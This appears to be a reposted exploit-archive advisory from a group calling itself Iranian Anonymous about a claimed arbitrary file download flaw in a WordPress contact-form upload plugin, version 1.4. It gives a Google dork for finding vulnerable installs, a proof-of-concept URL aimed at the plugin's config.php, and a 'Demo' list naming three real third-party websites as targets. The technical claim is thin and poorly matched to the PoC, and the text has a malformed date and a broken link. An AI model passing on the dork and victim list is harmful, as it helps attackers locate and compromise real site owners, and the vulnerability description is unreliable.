Wordpress Plugin N-Media 1.4 Arbitrary File Download Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Wordpress Plugin N-Media 1.4 Arbitrary File Download Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>########################## # Exploit Title: Wordpress Plugin N-Media 1.4 Arbitrary File Download Vulnerability # Google Dork : intext:index of website-contact-form-with-file-upload config.php # Date: 10/11/2016 # Software Link : https://downloads.wordpress.org/plugin/website-contact-form-with-file-upload config.php 1.4.zip # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: turk.Khan # Tested on : Windows7 # Version: 1.4 ########################## # Info : The "File Download" (ajax) function is affected Arbitrary File Download Vulnerability # Poc : http://www.site.com//wp-content/plugins/website-contact-form-with-file-upload/config.php ############################### # Demo : http://immobilierelotfi.com/wp-content/plugins/website-contact-form-with-file-upload/config.php http://www.inbalancehealthcorp.com/wp-content/plugins/website-contact-form-with-file-upload/config.php http://mijuprint.com/new/wp-content/plugins/website-contact-form-with-file-upload/config.php ############################# #Thanks to : MR.Khatar || ll_azab-siyah_ll || Blackwolf_Iran ||Ormazd ||Sh@d0w ||mohammad Pn ||Shdmehr || And All Of Iranian Anonymous . # Discovered By: turk.Khan</BODY></HTML>
